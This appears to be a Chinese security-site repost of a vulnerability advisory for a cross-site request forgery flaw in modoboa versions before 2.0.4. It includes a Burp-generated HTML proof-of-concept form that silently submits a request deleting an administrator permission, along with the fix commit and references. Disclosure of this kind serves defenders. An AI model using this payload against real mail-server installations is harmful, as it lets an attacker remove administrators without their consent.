GitHub 存储库 modoboa/modoboa 2.0.4 之前的跨站请求伪造 (CSRF)

admin
admin
admin
138324
文章
113
评论
2023年2月8日12:31:07评论31 views字数 842阅读2分48秒阅读模式

描述

GitHub 存储库 modoboa/modoboa 2.0.4 之前的跨站请求伪造 (CSRF)

remove 函数易受 CSRF 攻击导致删除任何管理员用户 GET /admin/permissions/remove/?domid=2&daid=15

概念验证

  1. / 访问 /admin/domains/1/

  2. /删除按钮移除权限易受CSRF攻击

    https://drive.google.com/file/d/1fs_2MID6uT_f7rvjJQYK_m-e6q39PMez/view?usp=sharing

  3.  通过更改值访问 POC 将删除管理员用户名

<html>  <!-- CSRF PoC - generated by Burp Suite Professional -->  <body>  <script>history.pushState('', '', '/')</script>    <form action="https//l27.0.0.1/admin/permissions/remove/">      <input type="hidden" name="domid" value="2" />      <input type="hidden" name="daid" value="15" />      <input type="submit" value="Submit request" />    </form>  </body></html>

GitHub 存储库 modoboa/modoboa 2.0.4 之前的跨站请求伪造 (CSRF)https://github.com/modoboa/modoboa/commit/38d778cc71e370216e067d054ce0169ad83078c8

参考资料

通过删除中的管理用户名导致相同的结果

https://huntr.dev/bounties/0a852351-00ed-44d2-a650-9055b7beed58/

https://huntr.dev/bounties/d7007f76-3dbc-48a7-a2fb-377040fe100c/

影响

允许攻击者诱使用户执行他们不打算执行的操作

原文始发于微信公众号(Ots安全):GitHub 存储库 modoboa/modoboa 2.0.4 之前的跨站请求伪造 (CSRF)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月8日12:31:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   GitHub 存储库 modoboa/modoboa 2.0.4 之前的跨站请求伪造 (CSRF)https://cn-sec.com/archives/1536844.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息